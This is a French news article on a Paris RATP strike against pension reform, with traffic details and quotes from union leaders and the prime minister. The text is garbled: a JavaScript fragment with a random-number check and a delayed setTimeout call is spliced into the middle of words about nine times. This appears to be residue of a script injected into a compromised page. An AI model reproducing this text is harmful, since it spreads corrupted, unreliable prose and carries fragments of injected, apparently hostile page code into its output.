Une journée chaotique débute avec la grève à la RATP sur les retraites
Des trotdom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}toirs bondés, des flottilles de vélos et trottinettes et plus de 280 km de bouchons cumulés: la grève à la RATP, première offensive syndicale contre la réforme des retraites, est très suivie vendredi, avec dix lignes de métro fermées, très peu de RER et un bus sur trois en moyenne.
A la gare Saint-Lazare, Léa, 20 ans, alternante en ressources humaines, manœuvre entre son téléphone et sa carte de crédit pour s’inscrire sur une application de trottinettes en libre-service, dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}tout en bloquant l’engin entre ses jambes. Elle vit à Rouen et doit rejoindre le XVe arrondissement à trottinette pour la première fois: “il va bien falloir que j’aille au travail”, dit-elle, inquiète.
La mobilisation est inédite depuis douze ans: le 18 ocdom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}tobre 2007, une grève de la RATP et de la SNCF visait déjà une réforme des régimes spéciaux de
Sur les lignes audom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}tomatiques 1 et 14 du métro qui fonctionnent normalement, la saturation attendue n’est pas au rendez-vous, beaucoup d’usagers ayant pris leurs disposition pour être en télétravail pour prendre des transports alternatifs.
Dans le RER, le trafic est très fortement perturbé avec un RER A sur trois et un RER B sur cinq (avec interconnexion interrompue avec la SNCF en gare du Nord) uniquement aux heures de pointe.
Sur la partie nord du RER B (à partir de Gare du Nord), gérée par la SNCF, on compte un train sur deux dans la journée.
La RATP “présente ses excuses aux voyageurs” et assure que le trafic reprendra normalement samedi à 5H30.
– Premier coup de semonce –
Pour les syndicats qui ont appelé à la mobilisation, dont les trois organisations représentatives, Unsa, CGT et CFE-CGC, il s’agit du “premier coup de semonce” contre la réforme des retraites et pour le maintien du régime spécial des agents de la régie des transports parisiens.
“C’est pas une grève de privilégiés, c’est une grève de salariés qui disent +on veut avoir une retraite à un âge raisonnable et partir dans des conditions raisonnables+”, a estimé sur franceinfo le secrétaire général de la CGT Philippe Martinez.
Les régimes spéciaux sont appelés à disparaître avec la mise en place du système universel de retraite par points voulu par le président Emmanuel Macron.
“Le chauffeur de bus du Havre, ou de Bordeaux ou de Metz, il a parfois le même travail que celui de la RATP dans les mêmes conditions, en dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}tout cas avec des contraintes approchantes, et il a un régime de retraite qui n’a rien à voir”, avait lancé jeudi le Premier ministre Édouard Philippe sur TF1.
“Je suggère à Monsieur Édouard Philippe qui connait bien Le Havre d’avoir de meilleures conditions pour les chauffeurs de bus parce que la pénibilité au travail, c’est la même. Au lieu de baisser les droits de ceux qui en ont, augmendom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}tons les droits de ceux qui n’en ont pas”, a rédom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}torqué Philippe Martinez.
Pour FO Transports et Logistique, la remise en cause du statut “aurait pour conséquence une baisse de 30%” des pensions des salariés de la RATP.
D’autres catégories et syndicats vont défiler dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}tout au long du mois de septembre: avocats, médecins, ou encore hôtesses et pilotes lundi prochain, personnels d’EDF jeudi, avant une mobilisation nationale de FO le 21 et de la CGT le 24 septembre.